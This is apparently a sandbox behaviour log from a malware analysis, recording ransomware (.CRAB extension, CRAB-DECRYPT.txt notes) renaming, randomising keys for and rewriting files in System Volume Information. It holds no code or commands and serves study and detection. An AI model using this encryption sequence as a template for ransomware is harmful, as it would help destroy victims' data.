File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1488 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 1488 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3016 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 3024 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3608 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 3616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3304 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 3312 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{dbab67da-647a-401e-a02b-58c06249c638}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 1352 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 1360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{ee224d27-954d-4040-87c6-066b5517487c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppCbsHiveStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppCbsHiveStore\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{00C95144-E912-40B3-A2D1-B8E12BC815D0}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 264 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 272 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1CE95DD8-C40B-44FD-A9E6-D72D44ED8F39}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{1E9425CC-553B-418F-B0C6-AD1AC9E1BA0C}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29088C66-DE5F-456F-85C0-6E4156F94358}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 1048576, size_out = 56376 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 56384 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_DriverPackageInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 1048576, size_out = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 432 True 1
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\SppGroupCache\{29296136-1F54-4FD8-B5C7-32FC96EF3C76}_WindowsUpdateInfo.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo, destination_filename = C:\System Volume Information\SPP\SppGroupCache\{4204EE1B-0338-4788-B199-D83E4955FAF1}_DriverPackageInfo.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
